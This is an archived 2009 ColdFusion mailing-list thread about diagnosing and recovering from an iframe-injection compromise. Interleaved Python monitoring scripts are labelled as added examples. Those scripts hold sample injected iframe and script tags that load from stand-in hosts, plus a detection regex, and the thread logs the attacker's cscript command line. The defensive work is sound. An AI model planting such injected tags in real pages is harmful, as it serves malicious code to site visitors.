Re: Question about hack

2009-04-30 Thread ALL

Well, in our case, we already fixed the problem that allowed the person to
upload in the first place.
I posted it in one of the first posts in this thread.

The problem we were having was finding the script that was still getting
run, which we finally found.

On Thu, Apr 30, 2009 at 10:53 AM, Dave Watts  wrote:

> Well, actually, that's not the final cause of the problem, just to be
> clear. The cause was whatever allowed someone to upload the file in
> the first place.

~|
Adobe® ColdFusion® 8 software 8 is the most important and dramatic release to 
date
Get the Free Trial
http://ad.doubleclick.net/clk;207172674;29440083;f

Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322081
Subscription: http://www.houseoffusion.com/groups/cf-talk/subscribe.cfm
Unsubscribe: http://www.houseoffusion.com/cf_lists/unsubscribe.cfm?user=89.70.4


Re: Question about hack

2009-04-30 Thread Dave Watts

> We finally fixed our issue.
> After a long crackdown on security on our server, one of our sites (the one
> that was causing all the fuss) gave me its name and after about 2 mins it
> was quite clear what was causing it.
>
> mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 )
>
> And we already moved the sites that had important info to another *secure*
> server, so until we get the DNS info to all the sites so we can migrate them
> over to another server, we are going to have to stick with this one for a
> few weeks.
>
> Just figured I'd share the final cause of the problem.

Well, actually, that's not the final cause of the problem, just to be
clear. The cause was whatever allowed someone to upload the file in
the first place.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322080


RE: Question about hack

2009-04-30 Thread Mark Kruger

Nate,

Thanks for the post follow up. Very helpful.

-Mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322079


Re: Question about hack

2009-04-30 Thread ALL

We finally fixed our issue.
After a long crackdown on security on our server, one of our sites (the one
that was causing all the fuss) gave me its name and after about 2 mins it
was quite clear what was causing it.

mw.asp - (contents can be found here: http://pastebin.com/f5d798bd1 )

And we already moved the sites that had important info to another *secure*
server, so until we get the DNS info to all the sites so we can migrate them
over to another server, we are going to have to stick with this one for a
few weeks.

Just figured I'd share the final cause of the problem.

-Nathan



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:322077


Re: Question about hack

2009-04-23 Thread Dave Watts

> The issue with formatting is that it will likely come back when we move our
> sites back onto the server.
> From what I am gathering it is actually being run manually, not on
> a scheduled task and likely remotely.
>
> I "Believe" this is coming from ASP and not ColdFusion itself, due to
> articles like this

Well, it's your job to secure the new server so that this doesn't
happen. But the server is compromised right now to a degree that I
wouldn't want to guarantee you can fix the problem.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321901


Re: Question about hack

2009-04-23 Thread ALL

The issue with formatting is that it will likely come back when we move our
sites back onto the server.
From what I am gathering it is actually being run manually, not on
a scheduled task, and likely remotely.

I "Believe" this is coming from ASP and not ColdFusion itself, due to
articles like this:
http://translate.google.com/translate?hl=en&sl=zh-CN&u=http://q.163.com/lianglimi/blog/hhl...@126/669001092009320624566/&ei=B7bwSfuPDcWFtgfP7YW-Dw&sa=X&oi=translate&resnum=1&ct=result&prev=/search%3Fq%3Dcscript%2Bscan.vbe%26hl%3Den%26rlz%3D1C1GGLS_enUS324US324%26sa%3DG
(originally in Chinese or something; I used Google to translate it).



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321898


RE: Question about hack

2009-04-23 Thread Mark Kruger

Nate,

Excellent ...thanks for this.

-mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321873


Re: Question about hack

2009-04-23 Thread Tom Chiverton

> I strongly recommend that you reformat the disk and reinstall. The

Much nodding here too!

If you can afford to, and it contains any sort of sensitive data, you really 
need to take this opportunity to buy all new hardware - anything could be 
running (in the BIOS, in the hypervisor, ...).

-- 
Helping to biannually extend infrastructures as part of the IT team of the 
year, '09 and '08

Tom Chiverton
Developer
Tel: +44 0161 618 5032
Fax: +44 0161 618 5099 
tom.chiver...@halliwells.com
3 Hardman Square, Manchester, M3 3EB
www.Halliwells.com



This email is sent for and on behalf of Halliwells LLP.

Halliwells LLP is a limited liability partnership registered in England and 
Wales under registered number OC307980 whose registered office address is at 
Halliwells LLP, 3 Hardman Square, Spinningfields, Manchester, M3 3EB. A list of 
members is available for inspection at the registered office together with a 
list of those non members who are referred to as partners. We use the word 
“partner” to refer to a member of the LLP, or an employee or consultant with 
equivalent standing and qualifications. Regulated by the Solicitors Regulation 
Authority.

CONFIDENTIALITY

This email is intended only for the use of the addressee named above and may be 
confidential or legally privileged. If you are not the addressee you must not 
read it and must not use any information contained in nor copy it nor inform 
any person other than Halliwells LLP or the addressee of its existence or 
contents. If you have received this email in error please delete it and notify 
Halliwells LLP IT Department on 0870 365 2500.

For more information about Halliwells LLP visit www.Halliwells.com.


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321850


Re: Question about hack

2009-04-23 Thread James Holmes

Some further instructions in this instructional vid:

http://www.youtube.com/watch?v=k-GaRKDsz-Y

mxAjax / CFAjax docs and other useful articles:
http://www.bifrost.com.au/blog/

2009/4/23 Dave Watts :
> I strongly recommend that you reformat the disk and reinstall. The
> machine has been compromised, and you really can't make it trustable
> again. If it's just a CF server, copy the CF files, export your CF
> settings, and after you reinstall Windows and CF you should be able to
> restore functionality pretty quickly.
>
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321849


Re: Question about hack

2009-04-23 Thread Dave Watts

> Not sure if any more info on this subject has come up, but here is the
> contents of the file gm.vbs that was doing all the dirty work:
> http://paste-it.net/public/v22f672/
>
> I have also noticed a new file named:
>
> 1.exe in the c:\ root directory. It has an icon of "BMW" (the car company),
> not sure if that has something to do with it either.

I strongly recommend that you reformat the disk and reinstall. The
machine has been compromised, and you really can't make it trustable
again. If it's just a CF server, copy the CF files, export your CF
settings, and after you reinstall Windows and CF you should be able to
restore functionality pretty quickly.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321848


Re: Question about hack

2009-04-23 Thread ALL

Not sure if any more info on this subject has come up, but here is the
contents of the file gm.vbs that was doing all the dirty work:
http://paste-it.net/public/v22f672/

I have also noticed a new file named:

1.exe in the c:\ root directory. It has an icon of "BMW" (the car company),
not sure if that has something to do with it either.

-Nathan



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321844


RE: Question about hack

2009-04-16 Thread Al Musella, DPM

A few ideas:

1. Set the FTP security to only allow connections from specific IP
addresses. If the user has a dynamic IP, then use his entire range..
better than letting the entire world in.

2. Your blog shows why I said to Michael to reformat the drive and
reinstall everything when he was attacked. Once you let someone else get
access to your server, there is no way you can ever trust it again. It
has to be reformatted.

3. I know it isn't the right way to fight an attack, but for this
specific attack, just put your index.cfm file into a different file,
then have your index.cfm file just do a cflocation to that page. If the
hack adds stuff to the index.cfm page, nothing will happen to the users.


At 03:31 PM 4/16/2009, you wrote:

>For those interested I have compiled all I know about this attack into a
>blog post:
>
>http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack
>
>Again, we have not specifically identified the attack but we have lots of
>information and a stop gap measure :)
>
>-Mark
>


Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321715


RE: Question about hack

2009-04-16 Thread Mark Kruger

Awesome Nate... I'm going to add this as an addendum to my post...

 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321708


Re: Question about hack

2009-04-16 Thread ALL

Hey, thanks Mark. I learnt a bit more about it from reading your article and
found more info on it last night when (as you stated) 9:00 rolled around...
I have been running a process monitor program that tracks file changes to
see what process/program is actually changing the files, and it was coming
from cscript.exe, which is the executor that runs *.vbs scripts and other
"visual" languages. The executing script was "c:/gm.vbs", but the script did
not exist when I went looking for it.

So, my thoughts on it are this is just the part doing the dirty work, and
there is an actual executable or service somewhere that is making the file
and executing it.

Here is the info my process monitor spit out about the cscript.exe file that
was doing the dirty work:

Path: "C:\WINDOWS\system32\cscript.exe"
Command Line: "cscript c:\gm.vbs d:\inetpub"
User: "NT AUTHORITY\SYSTEM"
Started: "4/15/2009 8:57:58 PM"
Ended: "4/15/2009 9:01:11 PM"
Architecture: 32-bit

I hope this may help anyone else working on this issue, I believe I am
extremely close to solving it and just need it to run once more, because
this time I have the process monitor tracking almost everything.

-Nathan Bruer




Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321703
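Nathan's Process Monitor capture above shows the pattern: cscript.exe run as NT AUTHORITY\SYSTEM against d:\inetpub, the script (c:\gm.vbs) already gone when anyone looked, and a dropped file (mw.asp) only identified later by hand. The following is an added example, not code from the original posts or from any tool named in the thread, of the check that makes that search mechanical: record a SHA-256 manifest of the webroot while the site is known-good, diff it on each run to list added, removed and modified files, and grep the changed ones for the injected-iframe pattern the thread describes. It is written in Python rather than CFML so it can run from a separate machine; the extension list, the iframe/script regular expression, and the file names and contents used in demo() are constructed for this example.

```python
import hashlib
import json
import re
import tempfile
from pathlib import Path

# Extensions worth tracking in a CF/ASP webroot (index.cfm was edited, mw.asp and
# gm.vbs were dropped in the thread). The list is an assumption for this example.
WATCHED_EXT = {".cfm", ".cfc", ".asp", ".aspx", ".htm", ".html", ".js", ".vbs", ".vbe"}

# Rough signature of the injected content the thread describes: a zero-size
# iframe or an externally sourced script tag. Constructed for this example.
INJECT_RE = re.compile(
    rb"<iframe[^>]*(?:width|height)\s*=\s*['\"]?0\b|<script[^>]+src\s*=\s*['\"]https?://",
    re.IGNORECASE,
)

def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_manifest(webroot) -> dict:
    """Map every watched file under webroot (relative POSIX path) to its SHA-256."""
    root = Path(webroot)
    return {
        p.relative_to(root).as_posix(): sha256_file(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in WATCHED_EXT
    }

def diff_manifest(baseline: dict, current: dict) -> dict:
    """List files added, removed or modified between two manifests."""
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(p for p in baseline if p in current and baseline[p] != current[p]),
    }

def suspicious_files(webroot, rel_paths) -> list:
    """Of the given changed files, return those whose content matches INJECT_RE."""
    root = Path(webroot)
    return [rel for rel in rel_paths if INJECT_RE.search((root / rel).read_bytes())]

def save_manifest(manifest: dict, path) -> None:
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))

def load_manifest(path) -> dict:
    return json.loads(Path(path).read_text())

def demo() -> dict:
    """End-to-end run on a temporary webroot with constructed files (not a real site)."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "index.cfm").write_text("<html><body><cfoutput>#now()#</cfoutput></body></html>")
        (root / "about.cfm").write_text("<html><body>About us</body></html>")
        baseline = build_manifest(root)          # taken while the site is known-good

        # Simulate what the thread saw: a hidden iframe appended to index.cfm and a
        # new .asp file dropped into the webroot (placeholder content, not the real file).
        with (root / "index.cfm").open("a") as f:
            f.write('\n<iframe src="http://evil.invalid/x.htm" width=0 height=0></iframe>')
        (root / "mw.asp").write_text("<% ' placeholder for a dropped file %>")

        report = diff_manifest(baseline, build_manifest(root))
        report["suspicious"] = suspicious_files(root, report["added"] + report["modified"])
        return report

if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Keep the saved manifest off the server and run the scan from another host against a share or a copy: the script in the thread ran as SYSTEM, so any baseline stored on the box can be rewritten along with the pages. Note what the two checks tell you separately: the hash diff reports mw.asp even though the regex does not flag it, and a clean diff only proves the watched files did not change, not that the machine is trustworthy, which is Dave's point about reinstalling.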


RE: Question about hack

2009-04-16 Thread Mark Kruger

For those interested I have compiled all I know about this attack into a
blog post:

http://www.coldfusionmuse.com/index.cfm/2009/4/16/iframe.insertion.hack

Again, we have not specifically identified the attack but we have lots of
information and a stop gap measure :)

-Mark


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Mark Kruger [mailto:mkru...@cfwebtools.com] 
Sent: Tuesday, April 14, 2009 5:37 PM
To: cf-talk
Subject: RE: Question about hack


Thanks... I'll add that to my list. 

I have a pretty hefty blog post coming out on this tomorrow (or hopefully
tomorrow :).

-mark
 




Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321695


Re: Question about hack

2009-04-14 Thread Richard White

Thanks for the info, at least we know what to look for now. We will also try to 
set up something similar. Thanks again.



Archive: 
http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321602


Re: Question about hack

2009-04-14 Thread Al Musella, DPM

No - if you are hacked, the home page is available, but it includes a 
javascript that does bad things to the visitors.
The most common way is a sql injection attack, where they insert the 
javascript into some fields in the database, (in my case, they 
appended the javascript to all vchar fields in every table)  so when 
you display information on the website from the database, you 
inadvertently are also adding that javascript to the page.
  The recent attack that is being talked about has the attacker 
editing the index.cfm page and directly adding javascript to it.

In both types of attacks, the home page is available and you might 
not notice anything just by looking at it.
So my idea to detect it is to set up a cfhttp call to the index.cfm page.
I add a url parameter that signifies that the page should also 
display my own personal information from one of the tables. I do this 
because I know I won't change the information in the table, and if it 
does change, there was a problem.

So the first time I do the cfhttp call, I save the page, then all 
subsequent calls get compared to it.  If it changes, or is not 
available, I send an alert to my cell phone.
I do this as an automated task from a different server so I can test 
if the website is up also.

One problem I had was my banner ad changes, so I put a comment 
around the banner ad that says "start banner" "end banner", and snip 
that section out before comparing it.

At 12:34 PM 4/14/2009, you wrote:

>this sounds like a good idea. when a hack is taking place would the 
>home page not be available? is this because they are running 
>multiple scripts which takes all the resources?
>
>can you explain this a little more as i feel like it is a good idea, 
>and would like to understand how to implement it
>
>thanks
>
>
>
> >To test if I have been hacked:  I run an automated task from my
> >home computer that requests my home page every 15 minutes.  I use a
> >URL variable that tells my home page to display a footer (which only
> >appears when this particular url variable is present) which shows my
> >name, address, phone, email address and a few other fields taken from
> >my "members" table.  I then compare what is displayed to what I know
> >belongs there. (The only part that changes is the banner ad, which I
> >ignore)  IF the page isn't available, or if  any of the text
> >changes,  I send an alert to my cell phone.   When I was hacked last
> >year, every table in my database had a javascript inserted into it.
> >This will alert me if that happens again.  I do this for my 3 most
> >important web sites.



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321601

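One way to implement the baseline-and-compare check Al describes, written here as an added Python example rather than a cfhttp task (it is not code from the post). It assumes the page wraps its rotating banner in "start banner" / "end banner" HTML comments and renders a canary line from the members table only when a private URL parameter is present; the CANARY text and the sample pages are constructed for the example.

```python
"""Baseline-and-compare page monitor (added example, not code from the post)."""
import hashlib
import re
import urllib.request
from typing import List, Optional

# Constructed canary: the text the private URL parameter makes the page render.
CANARY = "Al Musella, 1234 Example St, (555) 010-0000"

# The only region allowed to change between fetches: the rotating banner.
BANNER_RE = re.compile(r"<!--\s*start banner\s*-->.*?<!--\s*end banner\s*-->", re.I | re.S)
# Active content worth naming in an alert when it was not in the baseline.
ACTIVE_RE = re.compile(r"<script\b[^>]*>.*?</script>|<iframe\b[^>]*>", re.I | re.S)


def normalize(html: str) -> str:
    """Strip the banner and collapse whitespace so only real changes count."""
    return re.sub(r"\s+", " ", BANNER_RE.sub("", html)).strip()


def fingerprint(html: str) -> str:
    """Stable hash of the normalized page; store this as the saved baseline."""
    return hashlib.sha256(normalize(html).encode("utf-8")).hexdigest()


def compare(baseline_html: str, current_html: Optional[str], canary: str) -> List[str]:
    """Return alert reasons; an empty list means the page still matches."""
    if current_html is None:
        return ["page unavailable"]
    base, cur = normalize(baseline_html), normalize(current_html)
    findings = []
    if canary not in cur:
        findings.append("canary footer missing or altered")
    if base != cur:
        findings.append("page body differs from baseline")
        # Name any script/iframe that is new, the usual shape of an injection.
        for tag in sorted(set(ACTIVE_RE.findall(cur)) - set(ACTIVE_RE.findall(base))):
            findings.append("new active content: " + tag[:80])
    return findings


def fetch(url: str, timeout: float = 10.0) -> Optional[str]:
    """Fetch the page from the monitoring host; None means unavailable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    except Exception:
        return None


# Constructed sample pages used to exercise the comparison offline.
BASELINE = """<html><body>
<h1>Welcome</h1>
<!-- start banner --><a href="/ad/1"><img src="/ads/1.gif"></a><!-- end banner -->
<p>Site content</p>
<div id="canary">Al Musella, 1234 Example St, (555) 010-0000</div>
</body></html>"""
ROTATED = BASELINE.replace("/ads/1.gif", "/ads/2.gif")                        # banner changed only
INJECTED = BASELINE + '<script src="http://example.invalid/m.js"></script>'   # index file edited
DB_TAMPERED = BASELINE.replace("010-0000", "010-0000<script>evil()</script>")  # varchar field appended


def demo() -> dict:
    """Run the four cases; returns a name -> findings mapping."""
    return {
        "rotated": compare(BASELINE, ROTATED, CANARY),
        "injected": compare(BASELINE, INJECTED, CANARY),
        "db_tampered": compare(BASELINE, DB_TAMPERED, CANARY),
        "down": compare(BASELINE, None, CANARY),
    }


if __name__ == "__main__":
    for name, findings in demo().items():
        print(name, "->", findings or "OK")
```

The whole-page diff matters as much as the canary: when an injection appends script to every varchar field, the canary text is still present as a substring, so only the body comparison notices it. Run the monitor from a host other than the web server, and save the baseline fingerprint somewhere the web server cannot write to.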

RE: Question about hack

2009-04-14 Thread Mark Kruger

Thanks... I'll add that to my list. 

I have a pretty hefty blog post coming out on this tomorrow (or hopefully
tomorrow :).

-mark
 


Mark A. Kruger, CFG, MCSE
(402) 408-3733 ext 105
www.cfwebtools.com
www.coldfusionmuse.com
www.necfug.com

-Original Message-
From: Gerald Guido [mailto:gerald.gu...@gmail.com] 
Sent: Tuesday, April 14, 2009 4:08 PM
To: cf-talk
Subject: Re: Question about hack


Mark,
I can confirm that there have been FTP-related 'sploits going around.

I received a message from a hosting company warning that:

"There is a potential security exploit within the FTP software that we use
on your account."

Just a 411

G!

On Mon, Apr 13, 2009 at 1:13 PM, Mark Kruger  wrote:

>
> Donnie,
>
> I believe this is the same attack I have been helping another customer 
> with and it does not appear to be related to CF. Instead, it appears 
> to start with a malware install of some kind on the server (and 
> possibly a root kit) and then progress to the creation of accounts and 
> the changing of file permissions. Another theory gaining weight (and 
> illustrating that we don't know much yet) is that this attack is an 
> agent on a client computer that piggybacks onto FTP - which explains a 
> few things but not everything. I'm guessing some combination at this
point.
>
> Anyway, I agree that cfexecute is a dangerous tag that needs to be 
> controlled, but it does not appear to be the culprit. All of this 
> advice is good, but the only place that CF comes into play on this 
> particular hack happens to be the propensity to use "index.cfm" as the
home page script.
> The
> attack targets "index.*" files and affects (on the server I am working
> with)
> Index.cfm, index.html and index.php etc.
>
> -Mark
>
>
>
> Mark A. Kruger, CFG, MCSE
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
> -Original Message-
> From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com]
> Sent: Monday, April 13, 2009 8:30 AM
> To: cf-talk
> Subject: Re: Question about hack
>
>
> Hi Nick,
>
> I know this post is a bit late but to your original question, that 
> attack is as a result of incorrect file/iis permissions and is not an 
> XSS attack. I would even bet that you are on a shared server (at HMS) 
> since one of my client sites had this exact same problem. The attacker 
> would have gained access to the file system (possibly via FTP) and 
> executed code that injected the code into all index.* files on the 
> server (not just your hosting account). We have had a lot of problems 
> trying to get this sorted out. It appears that the issue was with 
> security related to the windows script host and/or CFEXECUTE. The only 
> thing you can do to prevent this is work with your hosting provider to 
> secure the system or move to a VPS or dedicated account and make sure 
> your FTP accounts are secure.
>
> HTH
>
> Donnie Bachan
> "Nitendo Vinces - By Striving You Shall Conquer"
> ==
> The information transmitted is intended only for the person or entity 
> to which it is addressed and may contain confidential and/or 
> privileged material. Any review, retransmission, dissemination or 
> other use of, or taking of any action in reliance upon, this 
> information by persons or entities other than the intended recipient 
> is prohibited. If you received this in error, please contact the 
> sender and delete the material from any computer.
>
>
>
> On Mon, Apr 13, 2009 at 1:30 PM, Richard White  wrote:
> >
> > hi dave, i have scripts that write to the file system as well. what 
> > would i need to do to secure them, do you have a link that i could 
> > read in relation to this as i am a little lost as to what to do
> >
> > thanks
> >
> >> > We are having to scrub our files to remove the injected code 
> >> > (which
> >> is being written directly
> >> > to the files as the result of the hack allowing "FULL CONTROL" 
> >> > for
> >> the Everyone user on the
> >> > machine.
> >> >
> >> > Have you determined a solution for removing/preventing this?
> >>
> >> First, audit your code to find any scripts that can write to the 
> >> filesystem.
> >> Second, audit your code to find any scripts that pass unfiltered 
> >> user input to the database.
> >> Third, fix that code.
> >> Fourth, configure filesystem permissions properly to prevent CF or 
> >> your database from writing to the web server's webroot.
> >>
>

Re: Question about hack

2009-04-14 Thread Gerald Guido

Mark,
I can confirm that there have been FTP-related 'sploits going around.

I received a message from a hosting company warning that:

"There is a potential security exploit within the FTP software that we use
on your account."

Just a 411

G!

On Mon, Apr 13, 2009 at 1:13 PM, Mark Kruger  wrote:

>
> Donnie,
>
> I believe this is the same attack I have been helping another customer with
> and it does not appear to be related to CF. Instead, it appears to start
> with a malware install of some kind on the server (and possibly a root kit)
> and then progress to the creation of accounts and the changing of file
> permissions. Another theory gaining weight (and illustrating that we don't
> know much yet) is that this attack is an agent on a client computer that
> piggybacks onto FTP - which explains a few things but not everything. I'm
> guessing some combination at this point.
>
> Anyway, I agree that cfexecute is a dangerous tag that needs to be
> controlled, but it does not appear to be the culprit. All of this advice is
> good, but the only place that CF comes into play on this particular hack
> happens to be the propensity to use "index.cfm" as the home page script.
> The
> attack targets "index.*" files and affects (on the server I am working
> with)
> Index.cfm, index.html and index.php etc.
>
> -Mark
>
>
>
> Mark A. Kruger, CFG, MCSE
> (402) 408-3733 ext 105
> www.cfwebtools.com
> www.coldfusionmuse.com
> www.necfug.com
>
> -Original Message-
> From: Donnie Bachan (Gmail) [mailto:donnie.bac...@gmail.com]
> Sent: Monday, April 13, 2009 8:30 AM
> To: cf-talk
> Subject: Re: Question about hack
>
>
> Hi Nick,
>
> I know this post is a bit late but to your original question, that attack
> is
> as a result of incorrect file/iis permissions and is not an XSS attack. I
> would even bet that you are on a shared server (at HMS) since one of my
> client sites had this exact same problem. The attacker would have gained
> access to the file system (possibly via FTP) and executed code that
> injected
> the code into all index.* files on the server (not just your hosting
> account). We have had a lot of problems trying to get this sorted out. It
> appears that the issue was with security related to the windows script host
> and/or CFEXECUTE. The only thing you can do to prevent this is work with
> your hosting provider to secure the system or move to a VPS or dedicated
> account and make sure your FTP accounts are secure.
>
> HTH
>
> Donnie Bachan
> "Nitendo Vinces - By Striving You Shall Conquer"
> ==
> The information transmitted is intended only for the person or entity to
> which it is addressed and may contain confidential and/or privileged
> material. Any review, retransmission, dissemination or other use of, or
> taking of any action in reliance upon, this information by persons or
> entities other than the intended recipient is prohibited. If you received
> this in error, please contact the sender and delete the material from any
> computer.
>
>
>
> On Mon, Apr 13, 2009 at 1:30 PM, Richard White  wrote:
> >
> > hi dave, i have scripts that write to the file system as well. what
> > would i need to do to secure them, do you have a link that i could
> > read in relation to this as i am a little lost as to what to do
> >
> > thanks
> >
> >> > We are having to scrub our files to remove the injected code (which
> >> is being written directly
> >> > to the files as the result of the hack allowing "FULL CONTROL" for
> >> the Everyone user on the
> >> > machine.
> >> >
> >> > Have you determined a solution for removing/preventing this?
> >>
> >> First, audit your code to find any scripts that can write to the
> >> filesystem.
> >> Second, audit your code to find any scripts that pass unfiltered user
> >> input to the database.
> >> Third, fix that code.
> >> Fourth, configure filesystem permissions properly to prevent CF or
> >> your database from writing to the web server's webroot.
> >>
> >> Dave Watts, CTO, Fig Leaf Software
> >> http://www.figleaf.com/
> >>
> >> Fig Leaf Software provides the highest caliber vendor-authorized
> >> instruction at our training centers in Washington DC, Atlanta,
> >> Chicago, Baltimore, Northern Virginia, or on-site at your location.
> >> Visit http://training.figleaf.com/ for more
> > information!
> >
> >
>
>
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321595


Re: Question about hack

2009-04-14 Thread Richard White

thanks for the info

> > this sounds like a good idea. when a hack is taking place would the 
> home page not be
> > available? is this because they are running multiple scripts which 
> takes all the resources?
> 
> Many automated attacks deface your existing pages, or append
> additional content to those pages. Not all do, of course.
> 
> Dave Watts, CTO, Fig Leaf Software
> http://www.figleaf.com/
> 
> Fig Leaf Software provides the highest caliber vendor-authorized
> instruction at our training centers in Washington DC, Atlanta,
> Chicago, Baltimore, Northern Virginia, or on-site at your location.
> Visit http://training.figleaf.com/ for more 
information! 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321580


Re: Question about hack

2009-04-14 Thread Dave Watts

> this sounds like a good idea. when a hack is taking place would the home page 
> not be
> available? is this because they are running multiple scripts which takes all 
> the resources?

Many automated attacks deface your existing pages, or append
additional content to those pages. Not all do, of course.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/

Fig Leaf Software provides the highest caliber vendor-authorized
instruction at our training centers in Washington DC, Atlanta,
Chicago, Baltimore, Northern Virginia, or on-site at your location.
Visit http://training.figleaf.com/ for more information!

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321578


Re: Question about hack

2009-04-14 Thread Richard White

this sounds like a good idea. when a hack is taking place would the home page 
not be available? is this because they are running multiple scripts which takes 
all the resources?

can you explain this a little more as i feel like it is a good idea, and would 
like to understand how to implement it

thanks



>To test if I have been hacked:  I run an automated task from my 
>home computer that requests my home page every 15 minutes.  I use a 
>URL variable that tells my home page to display a footer (which only 
>appears when this particular url variable is present) which shows my 
>name, address, phone, email address and a few other fields taken from 
>my "members" table.  I then compare what is displayed to what I know 
>belongs there. (The only part that changes is the banner ad, which I 
>ignore)  IF the page isn't available, or if  any of the text 
>changes,  I send an alert to my cell phone.   When I was hacked last 
>year, every table in my database had a javascript inserted into it. 
>This will alert me if that happens again.  I do this for my 3 most 
>important web sites. 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321577


Re: Question about hack

2009-04-14 Thread Donnie Bachan (Gmail)

Hi Mark,

I only mentioned cfexecute because of the permissions set on our
specific case. Your info seems most likely. I did notice that there
was a cfm file created with a call to cfexecute on the webroot so this
should be a check as well.

 best regards
Donnie

On 4/13/09, Nick Gleason  wrote:
>
> Donnie, Mark,
>
> Our research so far seems to support Mark's analysis of this problem.
> There are still some unknowns here so that may change.  But, changing your
> FTP accounts and setting your FTP server to ban IPs after a certain number
> of failed login attempts will prevent most brute force attempts on FTP.  Our
> server admin didn't do that which appears to have been a mistake.
>
> Nick
>
> 
> .
>
>
>> -Original Message-
>> From: Mark Kruger [mailto:mkru...@cfwebtools.com]
>> Sent: Monday, April 13, 2009 1:14 PM
>> To: cf-talk
>> Subject: RE: Question about hack
>>
>>
>> Donnie,
>>
>> I believe this is the same attack I have been helping another
>> customer with and it does not appear to be related to CF.
>> Instead, it appears to start with a malware install of some
>> kind on the server (and possibly a root kit) and then
>> progress to the creation of accounts and the changing of file
>> permissions. Another theory gaining weight (and illustrating
>> that we don't know much yet) is that this attack is an agent
>> on a client computer that piggybacks onto FTP - which
>> explains a few things but not everything. I'm guessing some
>> combination at this point.
>>
>> Anyway, I agree that cfexecute is a dangerous tag that needs
>> to be controlled, but it does not appear to be the culprit.
>> All of this advice is good, but the only place that CF comes
>> into play on this particular hack happens to be the
>> propensity to use "index.cfm" as the home page script. The
>> attack targets "index.*" files and affects (on the server I
>> am working with) Index.cfm, index.html and index.php etc.
>>
>> -Mark
>>
>
>
>
> 

Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321565


Re: Question about hack

2009-04-13 Thread Al Musella, DPM

  To test if I have been hacked:  I run an automated task from my 
home computer that requests my home page every 15 minutes.  I use a 
URL variable that tells my home page to display a footer (which only 
appears when this particular url variable is present) which shows my 
name, address, phone, email address and a few other fields taken from 
my "members" table.  I then compare what is displayed to what I know 
belongs there. (The only part that changes is the banner ad, which I 
ignore)  IF the page isn't available, or if  any of the text 
changes,  I send an alert to my cell phone.   When I was hacked last 
year, every table in my database had a javascript inserted into it. 
This will alert me if that happens again.  I do this for my 3 most 
important web sites.





> > We have been attacked by the exact same hack.   We discovered it on
> > April 6 and it has proven impossible to clean/remove.
>
>hi, i am relatively new to CF and building web applications. i have 
>built a few web apps and tried to use as much security as i can. my 
>questions is how do you guys discover that you have been hacked? 
>would a hosting company let you know? does the customer let you know 
>of changes in behaviour? do you have a piece of software looking for 
>anything suspicious in the logs, etc...
>
>thanks



Archive: http://www.houseoffusion.com/groups/cf-talk/message.cfm/messageid:321555


RE: Question about hack

2009-04-13 Thread Nick Gleason

Donnie, Mark,

Our research so far seems to support Mark's analysis of this problem.
There are still some unknowns here so that may change.  But, changing your
FTP accounts and setting your FTP server to ban IPs after a certain number
of failed login attempts will prevent most brute force attempts on FTP.  Our
server admin didn't do that which appears to have been a mistake.

Nick


.
 

> -Original Message-
